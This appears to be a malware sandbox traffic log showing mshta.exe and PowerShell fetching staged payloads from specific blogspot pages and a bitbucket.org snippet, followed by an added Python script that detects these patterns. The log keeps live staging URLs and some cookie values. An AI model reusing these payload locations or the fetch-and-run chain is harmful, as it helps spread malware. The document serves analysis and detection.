Source: global traffic | HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1 | Accept: */* | Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.blogger.com | Connection: Keep-Alive | Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic | HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1 | Accept: */* | Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Connection: Keep-Alive | Host: accounts.google.com | Cookie: __Host-GAPS=1:L3viVeTwYcxGvOqhkZuspYUloSz1Cg:OYEqVJkk_9TWQB1Z
Source: global traffic | HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1 | Accept: */* | Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Connection: Keep-Alive | Host: www.blogger.com | Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic | HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: bitbucket.org
Source: global traffic | HTTP traffic detected: GET /css/maia.css HTTP/1.1 | Accept: */* | Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.google.com | If-Modified-Since: Mon, 25 May 2020 08:30:00 GMT | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /analytics.js HTTP/1.1 | Accept: */* | Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.google-analytics.com | If-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMT | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /css/maia.css HTTP/1.1 | Accept: */* | Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.google.com | If-Modified-Since: Mon, 25 May 2020 08:30:00 GMT | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /analytics.js HTTP/1.1 | Accept: */* | Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.google-analytics.com | If-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMT | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /p/ayoola.html HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: randikhanaekminar.blogspot.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: backbones1234511a.blogspot.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ghostbackbone123.blogspot.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: backbones1234511a.blogspot.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ghostbackbone123.blogspot.com | Connection: Keep-Alive
Source: C:\Windows\SysWOW64\mshta.exe | DNS query: name: bitly.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-Robots-Tag: noindex, nofollow | Content-Type: text/html; charset=UTF-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 0
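The request records above show two things a browser does not normally produce: a WindowsPowerShell user agent fetching a raw snippet file from bitbucket.org, and blogspot page paths ending in %22 (a percent-encoded double quote) that then propagate as %2522 through the blogger.com login redirects. The following is an added triage example, not part of the Joe Sandbox report: it parses records in the shape the report prints (request line, then headers) and flags those two patterns. The sample records are constructed from the page's own entries with cookies omitted; the CODE_HOSTING set is an illustrative assumption, not something the report defines.

```python
"""Triage of HTTP request records such as those listed above.

Added example (not part of the sandbox report). Flags two staging patterns:
  * a scripting-engine user agent (here WindowsPowerShell) downloading a raw
    file from a code-hosting or paste site, and
  * a request path ending in a stray percent-encoded double quote (%22).
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

IE7_COMPAT_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; "
                 "Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; "
                 ".NET CLR 3.0.30729; .NET CLR 3.5.30729)")

# Constructed sample records, modelled on the requests in the report (no cookies).
SAMPLE_RECORDS = [
    # PowerShell stage: raw snippet download from bitbucket.org
    "GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1\n"
    "Host: bitbucket.org",
    # Earlier stage: blogspot page fetched with a trailing encoded quote
    "GET /p/ghostbackup15.html%22 HTTP/1.1\n"
    "Accept: */*\n"
    f"User-Agent: {IE7_COMPAT_UA}\n"
    "Connection: Keep-Alive\n"
    "Host: ghostbackbone123.blogspot.com",
    # Stylesheet fetch triggered by that page; nothing to flag on its own
    "GET /css/maia.css HTTP/1.1\n"
    "Accept: */*\n"
    "Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1\n"
    f"User-Agent: {IE7_COMPAT_UA}\n"
    "Host: www.google.com",
]

# Sites where a raw-file download by a scripting engine is a staging pattern.
# Assumption: illustrative list only; extend it for your environment.
CODE_HOSTING = {"bitbucket.org", "github.com", "raw.githubusercontent.com",
                "gist.githubusercontent.com", "pastebin.com"}

# User-agent substrings that identify a scripting engine rather than a browser.
SCRIPT_ENGINE_UA_MARKERS = ("WindowsPowerShell/",)


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("host", "")

    @property
    def user_agent(self) -> str:
        return self.headers.get("user-agent", "")


def parse_record(record: str) -> Request:
    """Parse 'METHOD PATH HTTP/x.y' followed by 'Name: value' header lines."""
    lines = [ln for ln in record.strip().splitlines() if ln.strip()]
    method, path, _version = lines[0].split()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def find_indicators(req: Request) -> List[str]:
    """Return the names of the staging patterns a single request matches."""
    hits: List[str] = []
    if any(m in req.user_agent for m in SCRIPT_ENGINE_UA_MARKERS) and req.host in CODE_HOSTING:
        hits.append("script-engine-download-from-code-hosting")
    # Look at the path component only; the stray quote sits in the path, not the query.
    if urlsplit(req.path).path.endswith("%22"):
        hits.append("trailing-encoded-quote-in-path")
    return hits


def triage(records: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Parse every record and return (host, path, indicators) for the flagged ones."""
    flagged: List[Tuple[str, str, List[str]]] = []
    for rec in records:
        req = parse_record(rec)
        hits = find_indicators(req)
        if hits:
            flagged.append((req.host, req.path, hits))
    return flagged


if __name__ == "__main__":
    for host, path, hits in triage(SAMPLE_RECORDS):
        print(f"{host}{path}: {', '.join(hits)}")
```

Run against the constructed records, the bitbucket.org snippet fetch and the ghostbackbone123.blogspot.com page are flagged while the maia.css fetch is not; the double-encoded %2522 in its Referer only becomes meaningful once the originating page request has been tied to it, so that correlation is left to the analyst.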